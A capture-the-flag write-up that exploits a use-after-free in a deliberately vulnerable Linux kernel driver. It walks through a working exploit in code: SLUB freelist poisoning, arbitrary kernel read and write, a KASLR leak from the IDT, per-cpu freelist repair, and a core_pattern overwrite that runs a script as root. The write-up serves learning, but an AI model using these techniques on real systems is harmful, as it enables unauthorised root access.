A character driver that keeps a singly linked list of “NFTs”. Deleting the collection frees every node and forgets to clear a single pointer, so the whole list stays walkable after the free. That is the entire bug. Getting from there to a root shell took me longer than it should have, because the obvious fake chunk placement poisons the kmalloc-512 freelist, and the technique I wanted to finish with allocates from kmalloc-512 itself.

TL;DR

ioctl(0x1337) frees the head and every entry without NULLing anything, so READ and EDIT still walk the list. On kmalloc-512 with CONFIG_SLAB_FREELIST_HARDENED off, an entry’s freepointer sits at object offset 0x100, which is the last eight bytes of the user-writable nft[] buffer. So the list nodes leak the freelist and EDIT poisons it. Two allocations later, list index 4 dereferences a pointer I control, which is arbitrary read and write. From there: leak the kernel base out of the IDT at its fixed address, walk kmalloc_caches[0][9] -> cpu_slab + __per_cpu_offset[0] to repair the freelist I just wrecked, overwrite core_pattern with |/tmp/x, and segfault a child so the kernel runs the script as root.

Environment

-m 256M -cpu kvm64,+smep,+smap
-append "console=ttyS0 oops=panic panic=1 kpti=1 kaslr quiet"

Linux 6.0.15, x86_64, one vCPU, and oops=panic panic=1 so any mistake reboots the box instead of leaving a trace. rcS inserts the module, creates the device node from the mknod line it prints to dmesg, and drops to a shell as uid 1000:

crw-r--r--  1 root root 248, 0  /dev/Sofire
----------  1 root root      32  /flag.txt

The driver is world readable, the flag is not, so the whole game is getting the kernel to read that file.

The module

chall.c ships with the challenge. Two structures:

#define CHUNK_SIZE 0x100

typedef struct sofirium_head {      /* 0x80  -> kmalloc-128 */
    char coin_art[0x70];
    struct sofirium_entry *head;
    int total_nft;
} sofirium_head;

typedef struct sofirium_entry {     /* 0x108 -> kmalloc-512 */
    struct sofirium_entry *next;
    char nft[CHUNK_SIZE];
} sofirium_entry;

Four ioctls, all taking the same { int idx; char buffer[0x100]; } request:

cmd name what it does
0xdeadbeef ADD walk to the last entry, kmalloc(0x108), memcpy(new->nft, req.buffer, 0x100), link it
0xcafebabe READ walk idx times from head->head, copy_to_user(target->nft)
0xbabecafe EDIT walk idx times, copy_from_user(target->nft)
0x1337 FREE free the head, then free every entry

Two things about that table matter. The walk in READ and EDIT is a bare for (i = 0; i < req.idx; i++) target = target->next; with no bound and no check on total_nft, so idx can be any integer. And an entry is 0x108 bytes, which lands in kmalloc-512 with a stride of 0x200 and eight objects per page.

The nft[] buffer covers object offsets 0x08 to 0x108. Remember that range.

struct sofirium_entry occupies 0x108 bytes of a 0x200 kmalloc-512 slot: next at +0, nft[0x100] from +8 to +0x108, and SLUB’s freepointer at +0x100 falls inside the last eight bytes of nft

The bug

FREE:

next = head->head;
total_nft = head->total_nft;
kfree(head);

for (int i = 0; i < total_nft; i++) {
    tmp = next;
    next = next->next;
    kfree(tmp);
}

Nothing is set to NULL. head still points at a freed kmalloc-128 object, head->head still points at the first entry, and every ->next in the chain is still where it was. The list survives its own destruction, and READ and EDIT walk it happily.

Now the useful part. SLUB stores its freepointer inside the free object, at object + s->offset. Here is kmem_cache_alloc_trace from the challenge vmlinux:

ffffffff8121a83a:  mov    (%r12),%rax                  # s->cpu_slab
ffffffff8121a83e:  add    %gs:0x7edfb19a(%rip),%rax    # + this_cpu_off
ffffffff8121a846:  mov    0x8(%rax),%rdx               # c->tid
ffffffff8121a84f:  mov    (%rax),%r13                  # c->freelist
ffffffff8121a861:  mov    0x28(%r12),%eax              # s->offset
ffffffff8121a86e:  mov    0x0(%r13,%rax,1),%rbx        # next = *(obj + offset)
ffffffff8121a879:  call   ffffffff814bda90 <this_cpu_cmpxchg16b_emu>

Raw load, no XOR against s->random, so CONFIG_SLAB_FREELIST_HARDENED is off. As for the position, calculate_sizes puts the pointer in the middle of the object for any cache without a constructor or RCU freeing: s->offset = ALIGN_DOWN(object_size / 2, 8), so 512 / 2 = 0x100 here. The oops later confirms it with RAX = 0x100.

Object offset 0x100 is nft + 0xf8: the last eight bytes of the buffer I can read with READ and write with EDIT.

After ioctl 0x1337 the head is freed but still dereferenced, the ->next chain between e0, e1 and e2 is intact, and the SLUB freelist runs backwards through the same objects via their +0x100 freepointer

So after three ADDs and one FREE:

show(1, b);  e0 = *(uint64_t *)(b + 0xf8);   /* e1's freepointer -> e0 */

That is a heap leak with no spray and no side channel. The freelist is LIFO, entries were freed in order, so entry i holds a pointer to entry i-1.

Poisoning, and the placement problem

Poisoning is the standard move: EDIT index 2, put an address at offset 0xf8, and the next kmalloc(0x108) after e2 returns that address.

memcpy(b + 0xf8, &fake, 8);
edit(2, b);
add(b);        /* pops e2,   c->freelist = fake */
add(b);        /* pops fake, and links it into the list */

The second ADD is the one that matters. ADD walks to the last entry and links the new object there, so after those two calls the list reads e0 -> e1 -> e2 -> fake -> *(fake). Index 4 dereferences the first qword of my fake object, and that qword sits inside e0->nft, so EDIT index 0 rewrites it. Arbitrary read and write, one ioctl apart.

(The first ADD does something ugly along the way: it walks to e2, gets e2 back from the allocator, and then does target->next = new, so e2->next = e2. The list points at itself for exactly one call. The second ADD walks over the self-loop, lands back on e2 and links fake there, which repairs it.)

Now, where to put fake? My first version hardcoded page_base + 0x650, that is +0x50 into whichever entry occupies page_base + 0x600. The read and write primitives worked, the exploit wrote core_pattern, it forked a child, and the kernel died:

BUG: unable to handle page fault for address: 0000000400000101
RIP: 0010:kmem_cache_alloc_trace+0x7e/0x1c0
RAX: 0000000000000100    R13: 0000000400000001    R14: 0000000000000200
Call Trace:
 do_coredump+0xe74/0x1560
 get_signal+0x8fd/0x990
 arch_do_signal_or_restart+0x2d/0x210

+0x7e is mov 0x0(%r13,%rax,1),%rbx from the listing above. RAX = 0x100 is s->offset, R14 = 0x200 is the allocation size, and R13 = 0x400000001 is the freelist head. The kernel was reading the freepointer of the object I had handed it, and that object’s +0x100 is not memory I ever wrote.

The fake entry at e0+0x50 has its next field inside e0->nft, reachable with EDIT index 0, but its own freepointer at fake+0x100 lands at e0+0x150, in the slab tail that no ioctl can write

The geometry is what makes this unavoidable. Stride 0x200, freepointer at +0x100, nft[] covering +0x08 to +0x108. Take a fake object at eX + k:

  • to control fake->next I need those eight bytes inside a writable nft[], so k has to be between 0x08 and 0x100;
  • the freepointer SLUB will read is then at eX + k + 0x100, which lands somewhere in [eX + 0x108, eX + 0x200], in other words the dead tail of the slot.

The single exception is k = 0x100 exactly, where fake + 0x100 falls on e(X+1) + 0. Not writable either, but it is e(X+1)->next, and that field already contains a valid kernel pointer.

Worse, the crash was not optional. do_coredump allocates from kmalloc-512 on its way to the usermode helper (R14 = 0x200 in the oops), so the very technique I was aiming for consumes the freelist I had just poisoned. A corrupted kmalloc-512 freelist and core_pattern do not coexist.

Two ways out:

  1. Take that k = 0x100 placement and let SLUB inherit e(X+1)->next. Cheap, but it needs eX and e(X+1) to be adjacent in the slab, and they are not always: the gap between two consecutive entries was 0x200 on most boots and 0x400 on others, so this version needs a layout check and a rerun when the check fails.
  2. Keep the fake object wherever it is, and repair c->freelist with the read and write primitives before anything else allocates.

I went with the second one. It works regardless of slab layout, and it uses primitives I already have.

Repairing the per-cpu freelist

The disassembly already spells out the path. kmem_cache_alloc_trace does mov (%r12),%rax then add %gs:this_cpu_off,%rax, so the per-cpu structure lives at s->cpu_slab + per_cpu_offset. All I need is s.

cache    = aar64(kbase + 0x16701c0 + 9 * 8);   /* kmalloc_caches[KMALLOC_NORMAL][9] */
cpu_slab = aar64(cache);                       /* s->cpu_slab, first field */
pcpu_off = aar64(kbase + 0x166f8a0);           /* __per_cpu_offset[0] */
c        = cpu_slab + pcpu_off;

kmalloc_caches is the global array of generic caches, struct kmem_cache *kmalloc_caches[NR_KMALLOC_TYPES][KMALLOC_SHIFT_HI + 1]. First index is the type (KMALLOC_NORMAL is 0), second is log2(size), so [0][9] is the cache for 512-byte objects. cpu_slab is the first field of struct kmem_cache, which makes the second read a plain dereference, but the value it returns is not a usable pointer: it is an offset into the per-cpu area. __per_cpu_offset[cpu] is the table that turns one into a real address, and the VM has a single vCPU, so index 0 is the only one that exists. On a multi-cpu box this is where you would pin yourself with sched_setaffinity first, otherwise you repair a freelist that belongs to a different core than the one you broke.

kmalloc_caches[0][9] dereferences to the kmem_cache, whose cpu_slab field plus __per_cpu_offset[0] gives the kmem_cache_cpu; its freelist field at +0x00 holds the garbage 0x400000001 and is overwritten with NULL

The write itself is a read-modify-write, because my primitive moves 0x100 bytes at a time and struct kmem_cache_cpu has three more fields I must not touch:

aar(c, b);                 /* freelist, tid, slab, partial, and whatever follows */
*(uint64_t *)b = 0;
aaw(c, b);

tid is the counter the fast path uses to notice it got preempted onto another cpu: the this_cpu_cmpxchg16b_emu call in the listing above swaps (freelist, tid) as a pair and retries when the compare fails. slab and partial are page pointers that get dereferenced on refill. None of the three is mine to invent, so they go back byte for byte.

Setting freelist to NULL is not a hack, it is the ordinary “this cpu has nothing cached” state. The next kmalloc(512) misses, falls into ___slab_alloc, takes a page from the partial list or the buddy allocator, and carries on. The addresses move with KASLR, but the garbage value has been identical on every boot I have seen:

[*] kmem_cache 0xffffa3b841042a00  cpu 0xffffa3b84f62d0f0  freelist 0x400000001 -> NULL

0x400000001 is the exact value from the panic, now defused before do_coredump can trip over it.

KASLR, and why the heap leak was a bad idea

All of the above needs kbase first. My original version took it from the slab page:

kbase = *(uint64_t *)(page_base) - 0x1936300;   /* &printk_sysctls */

The first object of the page had held a pointer to printk_sysctls, and subtracting its static offset gave the base. It worked on the boot where I found it, and on maybe two thirds of the boots after that. Then it stopped working entirely: three boots in a row, the first qword of the page was 6.

[d] +00 0x0000000000000006
[d] +08 0xffffffff9afb00e9
[d] +10 0x0000000000000000
[d] +18 0x0000000000000000
[d] +20 0xffffa0d8012042c0
[d] +28 0x0000000000000000
[d] +30 0xffffffff9ad3c569
[d] +38 0x00000000000001a4

Kernel pointers, plenty of them, but from a different object with a different layout, and nothing that tells me which symbol I am looking at. Residual heap data is not a leak primitive. It is a coincidence that happened to hold for a while.

The IDT is a better answer. CPU_ENTRY_AREA_BASE is 0xfffffe0000000000, a fixed address that KASLR does not randomize, and the IDT is mapped read only right at the start of it. Each gate is sixteen bytes with the handler address chopped into three pieces, and gate 0 always points at asm_exc_divide_error.

The 16-byte IDT gate splits the handler address into off_low at +0, off_mid at +6 and off_high at +8; reassembling them gives asm_exc_divide_error, and subtracting its static offset 0xe008f0 yields the kernel base

aar(0xfffffe0000000000UL, b);
kbase = ((uint64_t)*(uint16_t *)b
      | (uint64_t)*(uint16_t *)(b + 6) << 16
      | (uint64_t)*(uint32_t *)(b + 8) << 32) - 0xe008f0;

Nothing to spray and no symbol to guess at. The 2 MB alignment check that follows (kbase & 0x1fffff) has not fired once since I switched to it.

core_pattern

As uid 1000 I cannot open a file at mode 0000, so the last step is turning the arbitrary write into root code execution. core_pattern is the cheapest option: prefix it with a pipe and the kernel spawns that program as root whenever a process dumps core.

system("printf '#!/bin/sh\\ncp /flag.txt /tmp/flag\\nchmod 777 /tmp/flag\\n' > /tmp/x; chmod +x /tmp/x");
...
memset(b, 0, CHUNK_SIZE);
memcpy(b, "|/tmp/x", 7);
aaw(kbase + 0x1967f40, b);       /* &core_pattern */

Then a child segfaults:

if (!fork())
    *(volatile uint64_t *)0 = 0;
wait(NULL);
sleep(1);
system("cat /tmp/flag");

I first wrapped that in a setrlimit(RLIMIT_CORE, RLIM_INFINITY), assuming the default limit of 0 would suppress the dump. It does not. fs/coredump.c says it plainly in a comment: core limits are irrelevant to pipes, since the kernel is not writing to a filesystem. The one reserved value is 1, which umh_pipe_setup sets on the helper itself so a crash inside the helper cannot recurse. At 0 the helper runs normally. Dropping the setrlimit changed nothing over five boots, so it went.

modprobe_path would have worked too, but core_pattern is a single write with an obvious trigger, and by that point the freelist was already fixed so the extra kmalloc-512 in do_coredump cost nothing.

The exploit

#define FP  0xf8
#define ARB 4

void set_arb(uint64_t addr)
{
    char b[CHUNK_SIZE];
    memset(b, 0x72, CHUNK_SIZE);
    memcpy(b + 0x48, &addr, 8);     /* e0->nft[0x48] == fake->next */
    edit(0, b);
}

void aar(uint64_t addr, char *out) { set_arb(addr - 8); show(ARB, out); }
void aaw(uint64_t addr, char *in)  { set_arb(addr - 8); edit(ARB, in);  }

The - 8 is because READ and EDIT hand back target->nft, which is target + 8, so the fake pointer always aims eight bytes below what I actually want.

And the body, in order:

memset(b, 0x41, CHUNK_SIZE);
add(b); add(b); add(b);
del();

show(1, b);
e0   = *(uint64_t *)(b + FP);
fake = e0 + 0x50;

memcpy(b + FP, &fake, 8);
edit(2, b);
add(b);
add(b);

aar(IDT_RO, b);
kbase = ((uint64_t)*(uint16_t *)b | (uint64_t)*(uint16_t *)(b + 6) << 16
      | (uint64_t)*(uint32_t *)(b + 8) << 32) - OFF_DIVIDE_ERROR;
if (kbase & 0x1fffffUL)
    return printf("[!] bad kbase, rerun\n");

cache    = aar64(kbase + OFF_KMALLOC_CACHES + 9 * 8);
cpu_slab = aar64(cache);
pcpu_off = aar64(kbase + OFF_PER_CPU_OFFSET);
c        = cpu_slab + pcpu_off;

aar(c, b);
*(uint64_t *)b = 0;
aaw(c, b);

memset(b, 0, CHUNK_SIZE);
memcpy(b, "|/tmp/x", 7);
aaw(kbase + OFF_CORE_PATTERN, b);

A hundred lines with the ioctl wrappers. Nothing in there sprays, races, or executes a single instruction in kernel mode, which is why SMEP, SMAP and KPTI never enter the picture: the whole exploit is data only.

Full run:

/ $ id
uid=1000(user) gid=1000(user) groups=1000(user)
/ $ /exploit
[*] e0 0xffffa3b841214400 fake 0xffffa3b841214450
[*] kbase 0xffffffff9ba00000
[*] kmem_cache 0xffffa3b841042a00  cpu 0xffffa3b84f62d0f0  freelist 0x400000001 -> NULL
[*] core_pattern 0xffffffff9d367f40
flag{...}

Three boots, three flags, no panic.

Wrap-up

  • The bug is one missing = NULL. Everything after it comes from the fact that READ and EDIT keep walking a list of freed objects.
  • s->offset = 0x100 and a 0x108-byte structure mean the freepointer and the last eight bytes of the user buffer are the same memory. Leak with READ, poison with EDIT, no spray needed.
  • With a 0x200 stride, no fake chunk that overlaps a controlled buffer can have its own freepointer inside that buffer. You either land it on a slot that already contains a valid pointer, or you repair the freelist afterwards.
  • The repair is four reads and one write: kmalloc_caches[0][9] -> cpu_slab + __per_cpu_offset[0] -> freelist = NULL. Read the whole kmem_cache_cpu and write it back, or tid, slab and partial will bite.
  • Don’t build a KASLR leak on heap residue. The IDT at 0xfffffe0000000000 is free and identical on every boot.
  • core_pattern allocates from kmalloc-512 on its way to the usermode helper, which is exactly why a poisoned kmalloc-512 turns the last step of the exploit into the thing that kills the box.

References